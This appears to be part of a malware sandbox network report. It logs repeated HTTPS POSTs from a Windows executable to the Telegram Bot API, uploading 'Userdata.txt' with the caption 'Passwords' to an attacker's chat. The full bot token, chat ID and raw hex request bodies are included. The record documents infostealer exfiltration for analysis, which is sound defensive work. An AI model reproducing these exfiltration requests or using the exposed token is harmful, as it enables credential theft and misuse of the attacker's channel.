2025-01-11 06:24:16 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 32 39 31 37 61 32 34 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3242917a2401Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:16 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:16 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43767,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576656,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49883	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:18 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd325897e9bff1 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:18 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 38 39 37 65 39 62 66 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd325897e9bff1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:18 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:18 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43768,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576658,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49895	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:19 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd326bcf5d4f67 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:19 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 62 63 66 35 64 34 66 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd326bcf5d4f67Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:19 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:19 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43769,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576659,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49904	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:21 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd327c3cd25000 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:21 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 63 33 63 64 32 35 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd327c3cd25000Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:21 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:21 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43770,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576661,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49917	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:22 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd328f5a1d1c8d Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:22 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 66 35 61 31 64 31 63 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd328f5a1d1c8dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:22 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:22 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43771,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576662,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49933	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:24 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32a26a7e53b1 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:24 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 32 36 61 37 65 35 33 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32a26a7e53b1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:24 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:24 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43772,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576664,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49945	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:25 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32b6c93ca24d Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:25 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 36 63 39 33 63 61 32 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32b6c93ca24dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:26 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:26 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:26 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43773,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576666,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49957	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:27 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32c9bf1af266 Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:27 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 39 62 66 31 61 66 32 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32c9bf1af266Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:27 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
